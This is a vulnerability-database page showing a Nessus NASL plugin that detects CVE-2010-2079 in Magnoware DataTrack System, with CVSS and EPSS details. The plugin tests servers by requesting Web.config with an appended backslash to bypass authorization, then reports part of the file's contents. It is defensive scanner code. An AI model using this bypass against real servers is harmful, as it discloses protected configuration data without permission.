Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nessusThis is script is Copyright (C) 2010-2021 Tenable Network Security, Inc.DATATRACK_SYSTEM_INFO_DISCLOSURE.NASL
HistoryJun 11, 2010 - 12:00 a.m.

Magnoware DataTrack System Information Disclosure

2010-06-1100:00:00
This is script is Copyright (C) 2010-2021 Tenable Network Security, Inc.
www.tenable.com
22

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

0.003 Low

EPSS

Percentile

68.8%

JSON

The installed version of Magnoware DataTrack System is affected by an information disclosure vulnerability. By appending a backslash (‘\’) to a web request, it is possible for an attacker to view pages that require authorization.

Although Nessus has not checked for them, the installed version is also likely to be affected by several other vulnerabilities, including cross-site scripting and directory disclosure.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
 script_id(46866);
 script_version("1.10");
 script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");

 script_cve_id("CVE-2010-2079");

 script_name(english:"Magnoware DataTrack System Information Disclosure");
 script_summary(english:"Attempts to retrieve Web.config with a backslash");

 script_set_attribute(attribute:"synopsis", value:
"The remote web server hosts an application that is affected by an
information disclosure vulnerability." );
 script_set_attribute(attribute:"description", value:
"The installed version of Magnoware DataTrack System is affected by an
information disclosure vulnerability.  By appending a backslash ('\\')
to a web request, it is possible for an attacker to view pages that
require authorization.

Although Nessus has not checked for them, the installed version is
also likely to be affected by several other vulnerabilities, including
cross-site scripting and directory disclosure." );

 script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?d7656775");
 script_set_attribute(attribute:"see_also", value:"https://packetstormsecurity.com/1005-exploits/datatrackserver35-xss.txt" );
 script_set_attribute(attribute:"solution", value:"Unknown at this time.");
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");

 script_set_attribute(attribute:"vuln_publication_date", value:"2010/05/17");
 script_set_attribute(attribute:"plugin_publication_date", value:"2010/06/11");

 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();

 script_category(ACT_ATTACK);
 script_family(english:"CGI abuses");

 script_copyright(english:"This is script is Copyright (C) 2010-2021 Tenable Network Security, Inc.");

 script_require_ports("Services/www", 80);
 script_require_keys("www/ASP", "www/magnoware", "www/datatrack_system");
 script_dependencies("datatrack_system_detect.nasl");
 exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("webapp_func.inc");
include("data_protection.inc");

port = get_http_port(default:80,asp:TRUE);

install = get_install_from_kb(appname:'datatrack_system', port:port, exit_on_fail:TRUE);
url = install['dir'] + "/Web.config" + '\\';

file = '';
info = '';
# First exploit the issue...
res = http_send_recv3(port:port, method: "GET", item:url, exit_on_fail:TRUE, follow_redirect:TRUE);
if (
  '<configuration>' >< res[2] &&
  '<system.web>' >< res[2]    &&
  '<compilation defaultLanguage' >< res[2]
)
{
  file = res[2];

  # Check if we can access the page without backslash
  if(report_paranoia < 2)
  {
    res = http_send_recv3(port:port, method: "GET", item:install['dir'] + "/Web.config",exit_on_fail:TRUE);
    if (
      '<configuration>' >< res[2] &&
      '<system.web>' >< res[2]    &&
      '<compilation defaultLanguage' >< res[2]
    )
    exit(0, "Access to the DataTrack System Web.config on port "+ port + " is not restricted.");
  }

  if (report_verbosity > 0)
  {
    report = '\n' +
      'Nessus was able exploit this issue using the following URL : \n' +
      '\n' +
      build_url(port:port, qs:url) + '\n';

    if (report_verbosity > 1)
    {
      count = 0;
      foreach line (split(file))
      {
        info += line;
        count++;
        if(count >= 25)
        {
          info += '...';
          break;
        }
      }

      report += '\n' +
        '\n' +
        'Here are the contents of the file (limited to 25 lines) :\n' +
        '\n' +
        crap(data:"-", length:30) + " snip " + crap(data:"-", length:30) + '\n' +
        data_protection::sanitize_user_full_redaction(output:info) +
        crap(data:"-", length:30) + " snip " + crap(data:"-", length:30) + '\n';
    }
    security_warning(port:port,extra:report);
  }
  else security_warning(port);
  exit(0);
}
else
  exit(0,"The DataTrack System install at "+ build_url(port:port, qs:url) + " is not affected.");

Related

cvelist 1
nvd 1
prion 1
cve 1
openvas 2
cvelist
cvelist
CVE-2010-2079
2010-05-25 22:00:00
nvd
nvd
CVE-2010-2079
2010-05-25 22:30:02
prion
prion
Design/Logic Flaw
2010-05-25 22:30:00
cve
cve
CVE-2010-2079
2010-05-25 22:30:02
openvas
openvas
DataTrack System Multiple Vulnerabilities
2010-06-01 00:00:00
DataTrack System <= 3.5 Multiple Vulnerabilities
2010-06-01 00:00:00

5 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

0.003 Low

EPSS

Percentile

68.8%

JSON
Related for DATATRACK_SYSTEM_INFO_DISCLOSURE.NASL
cvelist1nvd1prion1cve1openvas2